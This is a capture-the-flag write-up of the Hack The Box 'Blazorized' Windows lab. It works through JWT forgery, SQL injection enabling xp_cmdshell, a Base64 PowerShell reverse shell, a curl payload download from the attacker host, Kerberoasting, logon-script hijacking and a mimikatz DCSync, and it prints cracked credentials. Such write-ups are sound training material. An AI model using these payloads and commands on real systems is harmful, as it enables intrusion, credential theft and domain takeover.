> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / WINDOWS / 2026-03-27

Hack The Box — Blazorized (Windows)

JWT key recovery from client DLL, SQL injection to enable xp_cmdshell for foothold, AD abuse chain with WriteSPN and scripted logon path manipulation, then DCSync to Administrator.

Target

  • IP: 10.129.25.120

Recon

sudo nmap -sC -sV 10.129.25.120 -p- -v

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-02 19:14:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
62014/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerate vhosts:

gobuster vhost -u 'http://blazorized.htb/' -w /home/kali/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 --append-domain

Found: api.blazorized.htb Status: 404 [Size: 0]
Found: admin.blazorized.htb Status: 200 [Size: 2072]

Go to http://admin.blazorized.htb. It is a super-admin panel with login form. We do not have credentials.

JWT signing key extraction from DLL

Go to http://blazorized.htb/check-updates. Open DevTools -> Network and download Blazorized.Helpers.dll. Open with dnSpy.

We find:

        // Token: 0x04000005 RID: 5
        private const long EXPIRATION_DURATION_IN_SECONDS = 60L;

        // Token: 0x04000006 RID: 6
        private static readonly string jwtSymmetricSecurityKey = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a";

        // Token: 0x04000007 RID: 7
        private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";

        // Token: 0x04000008 RID: 8
        private static readonly string postsPermissionsClaimValue = "Posts_Get_All";

        // Token: 0x04000009 RID: 9
        private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";

        // Token: 0x0400000A RID: 10
        private static readonly string superAdminRoleClaimValue = "Super_Admin";

        // Token: 0x0400000B RID: 11
        private static readonly string issuer = "http://api.blazorized.htb";

        // Token: 0x0400000C RID: 12
        private static readonly string apiAudience = "http://api.blazorized.htb";

        // Token: 0x0400000D RID: 13
        private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";

And we find the functions GenerateTemporaryJWT and GenerateSuperAdminJWT that use the same symmetric key.

Generate a super admin JWT. See helper script in attachments:

  • attachments/generate_super_admin_jwt.py

Copy generated JWT. In browser local storage, set key jwt to this value. Now super admin panel is accessible.

SQL injection and initial shell

Go to:

  • http://admin.blazorized.htb/check-duplicate-post-title

There is SQL injection.

sudo tcpdump -i tun0 icmp

Inject into form field:

'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell 'ping 10.10.15.1' --

We get pingback.

Generate a PowerShell reverse shell (Base64, PowerShell 3) from revshells.com.

nc -vlnp 4444

Inject payload:

'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMQAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' --

We get reverse shell as blazorized\NU_1055.

BloodHound and WriteSPN abuse

Upload and run SharpHound on victim. We get a zip file.

Attacker side:

impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)

Victim side:

net use \\10.10.15.1\share test12 /USER:test12
cp 20240702174454_BloodHound.zip \\10.10.15.1\share

In BloodHound, NU_1055 has WriteSPN over RSA_4810.

Upload PowerView.ps1 and import:

. .\PowerView.ps1
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser RSA_4810 -SPN | Get-DomainSPNTicket -Format Hashcat

Crack ticket hash:

./hashcat-6.2.6/hashcat.bin ./hash ./rockyou.txt
./hashcat-6.2.6/hashcat.bin ./hash ./rockyou.txt --show

Recovered password:

  • (Ni7856Do9854Ki05Ng0005 #)
evil-winrm -i 10.10.11.22 -u 'RSA_4810' -p '(Ni7856Do9854Ki05Ng0005 #)'

Abuse logon script path and become SSA_6010

. .\PowerView.ps1
Get-NetUser

From output, for SSA_6010 we see:

  • scriptpath : \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030
  • membership includes Super_Support_Administrators
type \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat

:: TO-DO: Notify LSA_3214 to write the logonScript for SSA_6010

Get-Acl \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat | Format-List -Property *

AccessToString shows write permissions for BLAZORIZED\RSA_4810.

Useful references:

  • https://learn.microsoft.com/it-it/troubleshoot/windows-server/group-policy/rebuild-sysvol-tree-and-content-in-a-domain
  • https://learn.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/assign-logon-script-profile-local-user

Create rev.bat containing Base64 PowerShell reverse shell.

cd C:\Windows\SYSVOL\sysvol\blazorized.htb\scripts
# or
cd C:\Windows\SYSVOL\domain\scripts
icacls A32FF3AEAA23

BLAZORIZED\RSA_4810:(OI)(CI)(RX,W)

cd A32FF3AEAA23
curl http://10.10.16.36/rev.bat -o rev.bat

Attacker:

nc -vlnp 4444

Victim:

Set-AdUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.bat'

Wait. We get reverse shell as SSA_6010.

DCSync to Administrator

Run SharpHound again as SSA_6010 and export zip.

Attacker:

impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)

Victim:

net use \\10.10.16.36\share test12 /USER:test12
cp 20240704101237_BloodHound.zip \\10.10.16.36\share\bloodhound.zip

In BloodHound, SSA_6010 has DCSync rights on blazorized.htb.

Upload mimikatz and run:

.\mimikatz.exe
lsadump::dcsync /domain:blazorized.htb /user:Administrator

Get NTLM hash:

  • f55ed1465179ba374ec1cad05b34a5f3
evil-winrm -i 10.10.11.22 -u 'Administrator' -H 'f55ed1465179ba374ec1cad05b34a5f3'

We get a shell as Administrator.